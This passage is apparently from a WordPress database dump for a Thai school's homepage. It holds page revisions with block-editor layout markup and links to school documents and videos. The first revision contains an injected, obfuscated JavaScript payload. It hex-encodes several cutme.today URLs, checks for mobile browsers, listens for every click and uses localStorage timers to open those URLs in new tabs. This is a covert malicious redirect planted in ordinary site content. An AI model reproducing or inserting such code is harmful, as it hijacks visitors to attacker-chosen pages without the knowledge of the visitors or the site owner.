_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-29 09:18:23','2024-08-29 02:18:23','',19,'http://watprato.ssk.in.th/?p=249',0,'revision','',0),
(250,2,'2024-08-29 09:20:50','2024-08-29 02:20:50','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container 